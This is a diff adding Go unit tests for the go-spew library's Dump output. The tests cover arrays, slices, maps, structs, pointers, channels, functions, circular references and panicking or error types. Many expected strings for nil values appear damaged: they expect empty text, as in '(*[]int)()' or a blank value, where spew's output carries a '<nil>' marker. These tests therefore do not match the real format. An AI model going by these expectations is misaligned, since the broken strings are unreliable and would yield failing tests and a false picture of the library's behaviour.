+ v2i0 := pstringer("1")
+ v2i1 := pstringer("2")
+ v2i2 := pstringer("3")
+ v2 := [3]pstringer{v2i0, v2i1, v2i2}
+ v2i0Len := fmt.Sprintf("%d", len(v2i0))
+ v2i1Len := fmt.Sprintf("%d", len(v2i1))
+ v2i2Len := fmt.Sprintf("%d", len(v2i2))
+ v2Len := fmt.Sprintf("%d", len(v2))
+ v2Cap := fmt.Sprintf("%d", cap(v2))
+ nv2 := (*[3]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.pstringer"
+ v2sp := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t +
+ ") (len=" + v2i0Len + ") stringer 1,\n (" + v2t +
+ ") (len=" + v2i1Len + ") stringer 2,\n (" + v2t +
+ ") (len=" + v2i2Len + ") " + "stringer 3\n}"
+ v2s := v2sp
+ if spew.UnsafeDisabled {
+ v2s = "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t +
+ ") (len=" + v2i0Len + ") \"1\",\n (" + v2t + ") (len=" +
+ v2i1Len + ") \"2\",\n (" + v2t + ") (len=" + v2i2Len +
+ ") " + "\"3\"\n}"
+ }
+ addDumpTest(v2, "([3]"+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*[3]"+v2t+")("+v2Addr+")("+v2sp+")\n")
+ addDumpTest(&pv2, "(**[3]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2sp+")\n")
+ addDumpTest(nv2, "(*[3]"+v2t+")()\n")
+
+ // Array containing interfaces.
+ v3i0 := "one"
+ v3 := [3]interface{}{v3i0, int(2), uint(3)}
+ v3i0Len := fmt.Sprintf("%d", len(v3i0))
+ v3Len := fmt.Sprintf("%d", len(v3))
+ v3Cap := fmt.Sprintf("%d", cap(v3))
+ nv3 := (*[3]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[3]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " +
+ "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" +
+ v3t4 + ") 3\n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Array containing bytes.
+ v4 := [34]byte{
+ 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+ 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+ 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+ 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+ 0x31, 0x32,
+ }
+ v4Len := fmt.Sprintf("%d", len(v4))
+ v4Cap := fmt.Sprintf("%d", cap(v4))
+ nv4 := (*[34]byte)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "[34]uint8"
+ v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+ "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" +
+ " |............... |\n" +
+ " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" +
+ " |!\"#$%&'()*+,-./0|\n" +
+ " 00000020 31 32 " +
+ " |12|\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+}
+
+func addSliceDumpTests() {
+ // Slice containing standard float32 values.
+ v := []float32{3.14, 6.28, 12.56}
+ vLen := fmt.Sprintf("%d", len(v))
+ vCap := fmt.Sprintf("%d", cap(v))
+ nv := (*[]float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "float32"
+ vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 3.14,\n (" +
+ vt + ") 6.28,\n (" + vt + ") 12.56\n}"
+ addDumpTest(v, "([]"+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*[]"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**[]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*[]"+vt+")()\n")
+
+ // Slice containing type with custom formatter on pointer receiver only.
+ v2i0 := pstringer("1")
+ v2i1 := pstringer("2")
+ v2i2 := pstringer("3")
+ v2 := []pstringer{v2i0, v2i1, v2i2}
+ v2i0Len := fmt.Sprintf("%d", len(v2i0))
+ v2i1Len := fmt.Sprintf("%d", len(v2i1))
+ v2i2Len := fmt.Sprintf("%d", len(v2i2))
+ v2Len := fmt.Sprintf("%d", len(v2))
+ v2Cap := fmt.Sprintf("%d", cap(v2))
+ nv2 := (*[]pstringer)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.pstringer"
+ v2s := "(len=" + v2Len + " cap=" + v2Cap + ") {\n (" + v2t + ") (len=" +
+ v2i0Len + ") stringer 1,\n (" + v2t + ") (len=" + v2i1Len +
+ ") stringer 2,\n (" + v2t + ") (len=" + v2i2Len + ") " +
+ "stringer 3\n}"
+ addDumpTest(v2, "([]"+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*[]"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**[]"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*[]"+v2t+")()\n")
+
+ // Slice containing interfaces.
+ v3i0 := "one"
+ v3 := []interface{}{v3i0, int(2), uint(3), nil}
+ v3i0Len := fmt.Sprintf("%d", len(v3i0))
+ v3Len := fmt.Sprintf("%d", len(v3))
+ v3Cap := fmt.Sprintf("%d", cap(v3))
+ nv3 := (*[]interface{})(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "[]interface {}"
+ v3t2 := "string"
+ v3t3 := "int"
+ v3t4 := "uint"
+ v3t5 := "interface {}"
+ v3s := "(len=" + v3Len + " cap=" + v3Cap + ") {\n (" + v3t2 + ") " +
+ "(len=" + v3i0Len + ") \"one\",\n (" + v3t3 + ") 2,\n (" +
+ v3t4 + ") 3,\n (" + v3t5 + ") \n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Slice containing bytes.
+ v4 := []byte{
+ 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18,
+ 0x19, 0x1a, 0x1b, 0x1c, 0x1d, 0x1e, 0x1f, 0x20,
+ 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28,
+ 0x29, 0x2a, 0x2b, 0x2c, 0x2d, 0x2e, 0x2f, 0x30,
+ 0x31, 0x32,
+ }
+ v4Len := fmt.Sprintf("%d", len(v4))
+ v4Cap := fmt.Sprintf("%d", cap(v4))
+ nv4 := (*[]byte)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "[]uint8"
+ v4s := "(len=" + v4Len + " cap=" + v4Cap + ") " +
+ "{\n 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20" +
+ " |............... |\n" +
+ " 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30" +
+ " |!\"#$%&'()*+,-./0|\n" +
+ " 00000020 31 32 " +
+ " |12|\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+
+ // Nil slice.
+ v5 := []int(nil)
+ nv5 := (*[]int)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "[]int"
+ v5s := ""
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+ addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+ addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+ addDumpTest(nv5, "(*"+v5t+")()\n")
+}
+
+func addStringDumpTests() {
+ // Standard string.
+ v := "test"
+ vLen := fmt.Sprintf("%d", len(v))
+ nv := (*string)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "string"
+ vs := "(len=" + vLen + ") \"test\""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+func addInterfaceDumpTests() {
+ // Nil interface.
+ var v interface{}
+ nv := (*interface{})(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "interface {}"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Sub-interface.
+ v2 := interface{}(uint16(65535))
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addMapDumpTests() {
+ // Map with string keys and int vals.
+ k := "one"
+ kk := "two"
+ m := map[string]int{k: 1, kk: 2}
+ klen := fmt.Sprintf("%d", len(k)) // not kLen to shut golint up
+ kkLen := fmt.Sprintf("%d", len(kk))
+ mLen := fmt.Sprintf("%d", len(m))
+ nilMap := map[string]int(nil)
+ nm := (*map[string]int)(nil)
+ pm := &m
+ mAddr := fmt.Sprintf("%p", pm)
+ pmAddr := fmt.Sprintf("%p", &pm)
+ mt := "map[string]int"
+ mt1 := "string"
+ mt2 := "int"
+ ms := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + klen + ") " +
+ "\"one\": (" + mt2 + ") 1,\n (" + mt1 + ") (len=" + kkLen +
+ ") \"two\": (" + mt2 + ") 2\n}"
+ ms2 := "(len=" + mLen + ") {\n (" + mt1 + ") (len=" + kkLen + ") " +
+ "\"two\": (" + mt2 + ") 2,\n (" + mt1 + ") (len=" + klen +
+ ") \"one\": (" + mt2 + ") 1\n}"
+ addDumpTest(m, "("+mt+") "+ms+"\n", "("+mt+") "+ms2+"\n")
+ addDumpTest(pm, "(*"+mt+")("+mAddr+")("+ms+")\n",
+ "(*"+mt+")("+mAddr+")("+ms2+")\n")
+ addDumpTest(&pm, "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms+")\n",
+ "(**"+mt+")("+pmAddr+"->"+mAddr+")("+ms2+")\n")
+ addDumpTest(nm, "(*"+mt+")()\n")
+ addDumpTest(nilMap, "("+mt+") \n")
+
+ // Map with custom formatter type on pointer receiver only keys and vals.
+ k2 := pstringer("one")
+ v2 := pstringer("1")
+ m2 := map[pstringer]pstringer{k2: v2}
+ k2Len := fmt.Sprintf("%d", len(k2))
+ v2Len := fmt.Sprintf("%d", len(v2))
+ m2Len := fmt.Sprintf("%d", len(m2))
+ nilMap2 := map[pstringer]pstringer(nil)
+ nm2 := (*map[pstringer]pstringer)(nil)
+ pm2 := &m2
+ m2Addr := fmt.Sprintf("%p", pm2)
+ pm2Addr := fmt.Sprintf("%p", &pm2)
+ m2t := "map[spew_test.pstringer]spew_test.pstringer"
+ m2t1 := "spew_test.pstringer"
+ m2t2 := "spew_test.pstringer"
+ m2s := "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len + ") " +
+ "stringer one: (" + m2t2 + ") (len=" + v2Len + ") stringer 1\n}"
+ if spew.UnsafeDisabled {
+ m2s = "(len=" + m2Len + ") {\n (" + m2t1 + ") (len=" + k2Len +
+ ") " + "\"one\": (" + m2t2 + ") (len=" + v2Len +
+ ") \"1\"\n}"
+ }
+ addDumpTest(m2, "("+m2t+") "+m2s+"\n")
+ addDumpTest(pm2, "(*"+m2t+")("+m2Addr+")("+m2s+")\n")
+ addDumpTest(&pm2, "(**"+m2t+")("+pm2Addr+"->"+m2Addr+")("+m2s+")\n")
+ addDumpTest(nm2, "(*"+m2t+")()\n")
+ addDumpTest(nilMap2, "("+m2t+") \n")
+
+ // Map with interface keys and values.
+ k3 := "one"
+ k3Len := fmt.Sprintf("%d", len(k3))
+ m3 := map[interface{}]interface{}{k3: 1}
+ m3Len := fmt.Sprintf("%d", len(m3))
+ nilMap3 := map[interface{}]interface{}(nil)
+ nm3 := (*map[interface{}]interface{})(nil)
+ pm3 := &m3
+ m3Addr := fmt.Sprintf("%p", pm3)
+ pm3Addr := fmt.Sprintf("%p", &pm3)
+ m3t := "map[interface {}]interface {}"
+ m3t1 := "string"
+ m3t2 := "int"
+ m3s := "(len=" + m3Len + ") {\n (" + m3t1 + ") (len=" + k3Len + ") " +
+ "\"one\": (" + m3t2 + ") 1\n}"
+ addDumpTest(m3, "("+m3t+") "+m3s+"\n")
+ addDumpTest(pm3, "(*"+m3t+")("+m3Addr+")("+m3s+")\n")
+ addDumpTest(&pm3, "(**"+m3t+")("+pm3Addr+"->"+m3Addr+")("+m3s+")\n")
+ addDumpTest(nm3, "(*"+m3t+")()\n")
+ addDumpTest(nilMap3, "("+m3t+") \n")
+
+ // Map with nil interface value.
+ k4 := "nil"
+ k4Len := fmt.Sprintf("%d", len(k4))
+ m4 := map[string]interface{}{k4: nil}
+ m4Len := fmt.Sprintf("%d", len(m4))
+ nilMap4 := map[string]interface{}(nil)
+ nm4 := (*map[string]interface{})(nil)
+ pm4 := &m4
+ m4Addr := fmt.Sprintf("%p", pm4)
+ pm4Addr := fmt.Sprintf("%p", &pm4)
+ m4t := "map[string]interface {}"
+ m4t1 := "string"
+ m4t2 := "interface {}"
+ m4s := "(len=" + m4Len + ") {\n (" + m4t1 + ") (len=" + k4Len + ")" +
+ " \"nil\": (" + m4t2 + ") \n}"
+ addDumpTest(m4, "("+m4t+") "+m4s+"\n")
+ addDumpTest(pm4, "(*"+m4t+")("+m4Addr+")("+m4s+")\n")
+ addDumpTest(&pm4, "(**"+m4t+")("+pm4Addr+"->"+m4Addr+")("+m4s+")\n")
+ addDumpTest(nm4, "(*"+m4t+")()\n")
+ addDumpTest(nilMap4, "("+m4t+") \n")
+}
+
+func addStructDumpTests() {
+ // Struct with primitives.
+ type s1 struct {
+ a int8
+ b uint8
+ }
+ v := s1{127, 255}
+ nv := (*s1)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.s1"
+ vt2 := "int8"
+ vt3 := "uint8"
+ vs := "{\n a: (" + vt2 + ") 127,\n b: (" + vt3 + ") 255\n}"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Struct that contains another struct.
+ type s2 struct {
+ s1 s1
+ b bool
+ }
+ v2 := s2{s1{127, 255}, true}
+ nv2 := (*s2)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.s2"
+ v2t2 := "spew_test.s1"
+ v2t3 := "int8"
+ v2t4 := "uint8"
+ v2t5 := "bool"
+ v2s := "{\n s1: (" + v2t2 + ") {\n a: (" + v2t3 + ") 127,\n b: (" +
+ v2t4 + ") 255\n },\n b: (" + v2t5 + ") true\n}"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Struct that contains custom type with Stringer pointer interface via both
+ // exported and unexported fields.
+ type s3 struct {
+ s pstringer
+ S pstringer
+ }
+ v3 := s3{"test", "test2"}
+ nv3 := (*s3)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "spew_test.s3"
+ v3t2 := "spew_test.pstringer"
+ v3s := "{\n s: (" + v3t2 + ") (len=4) stringer test,\n S: (" + v3t2 +
+ ") (len=5) stringer test2\n}"
+ v3sp := v3s
+ if spew.UnsafeDisabled {
+ v3s = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" +
+ v3t2 + ") (len=5) \"test2\"\n}"
+ v3sp = "{\n s: (" + v3t2 + ") (len=4) \"test\",\n S: (" +
+ v3t2 + ") (len=5) stringer test2\n}"
+ }
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3sp+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3sp+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Struct that contains embedded struct and field to same struct.
+ e := embed{"embedstr"}
+ eLen := fmt.Sprintf("%d", len("embedstr"))
+ v4 := embedwrap{embed: &e, e: &e}
+ nv4 := (*embedwrap)(nil)
+ pv4 := &v4
+ eAddr := fmt.Sprintf("%p", &e)
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "spew_test.embedwrap"
+ v4t2 := "spew_test.embed"
+ v4t3 := "string"
+ v4s := "{\n embed: (*" + v4t2 + ")(" + eAddr + ")({\n a: (" + v4t3 +
+ ") (len=" + eLen + ") \"embedstr\"\n }),\n e: (*" + v4t2 +
+ ")(" + eAddr + ")({\n a: (" + v4t3 + ") (len=" + eLen + ")" +
+ " \"embedstr\"\n })\n}"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+}
+
+func addUintptrDumpTests() {
+ // Null pointer.
+ v := uintptr(0)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "uintptr"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+
+ // Address of real variable.
+ i := 1
+ v2 := uintptr(unsafe.Pointer(&i))
+ nv2 := (*uintptr)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uintptr"
+ v2s := fmt.Sprintf("%p", &i)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+}
+
+func addUnsafePointerDumpTests() {
+ // Null pointer.
+ v := unsafe.Pointer(uintptr(0))
+ nv := (*unsafe.Pointer)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "unsafe.Pointer"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Address of real variable.
+ i := 1
+ v2 := unsafe.Pointer(&i)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "unsafe.Pointer"
+ v2s := fmt.Sprintf("%p", &i)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+func addChanDumpTests() {
+ // Nil channel.
+ var v chan int
+ pv := &v
+ nv := (*chan int)(nil)
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "chan int"
+ vs := ""
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Real channel.
+ v2 := make(chan int)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "chan int"
+ v2s := fmt.Sprintf("%p", v2)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addFuncDumpTests() {
+ // Function with no params and no returns.
+ v := addIntDumpTests
+ nv := (*func())(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "func()"
+ vs := fmt.Sprintf("%p", v)
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Function with param and no returns.
+ v2 := TestDump
+ nv2 := (*func(*testing.T))(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "func(*testing.T)"
+ v2s := fmt.Sprintf("%p", v2)
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Function with multiple params and multiple returns.
+ var v3 = func(i int, s string) (b bool, err error) {
+ return true, nil
+ }
+ nv3 := (*func(int, string) (bool, error))(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "func(int, string) (bool, error)"
+ v3s := fmt.Sprintf("%p", v3)
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+}
+
+func addCircularDumpTests() {
+ // Struct that is circular through self referencing.
+ type circular struct {
+ c *circular
+ }
+ v := circular{nil}
+ v.c = &v
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.circular"
+ vs := "{\n c: (*" + vt + ")(" + vAddr + ")({\n c: (*" + vt + ")(" +
+ vAddr + ")()\n })\n}"
+ vs2 := "{\n c: (*" + vt + ")(" + vAddr + ")()\n}"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs2+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs2+")\n")
+
+ // Structs that are circular through cross referencing.
+ v2 := xref1{nil}
+ ts2 := xref2{&v2}
+ v2.ps2 = &ts2
+ pv2 := &v2
+ ts2Addr := fmt.Sprintf("%p", &ts2)
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "spew_test.xref1"
+ v2t2 := "spew_test.xref2"
+ v2s := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t +
+ ")(" + v2Addr + ")({\n ps2: (*" + v2t2 + ")(" + ts2Addr +
+ ")()\n })\n })\n}"
+ v2s2 := "{\n ps2: (*" + v2t2 + ")(" + ts2Addr + ")({\n ps1: (*" + v2t +
+ ")(" + v2Addr + ")()\n })\n}"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s2+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s2+")\n")
+
+ // Structs that are indirectly circular.
+ v3 := indirCir1{nil}
+ tic2 := indirCir2{nil}
+ tic3 := indirCir3{&v3}
+ tic2.ps3 = &tic3
+ v3.ps2 = &tic2
+ pv3 := &v3
+ tic2Addr := fmt.Sprintf("%p", &tic2)
+ tic3Addr := fmt.Sprintf("%p", &tic3)
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "spew_test.indirCir1"
+ v3t2 := "spew_test.indirCir2"
+ v3t3 := "spew_test.indirCir3"
+ v3s := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 +
+ ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr +
+ ")({\n ps2: (*" + v3t2 + ")(" + tic2Addr +
+ ")()\n })\n })\n })\n}"
+ v3s2 := "{\n ps2: (*" + v3t2 + ")(" + tic2Addr + ")({\n ps3: (*" + v3t3 +
+ ")(" + tic3Addr + ")({\n ps1: (*" + v3t + ")(" + v3Addr +
+ ")()\n })\n })\n}"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s2+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s2+")\n")
+}
+
+func addPanicDumpTests() {
+ // Type that panics in its Stringer interface.
+ v := panicer(127)
+ nv := (*panicer)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.panicer"
+ vs := "(PANIC=test panic)127"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+func addErrorDumpTests() {
+ // Type that has a custom Error interface.
+ v := customError(127)
+ nv := (*customError)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "spew_test.customError"
+ vs := "error: 127"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+}
+
+// TestDump executes all of the tests described by dumpTests.
+func TestDump(t *testing.T) {
+ // Setup tests.
+ addIntDumpTests()
+ addUintDumpTests()
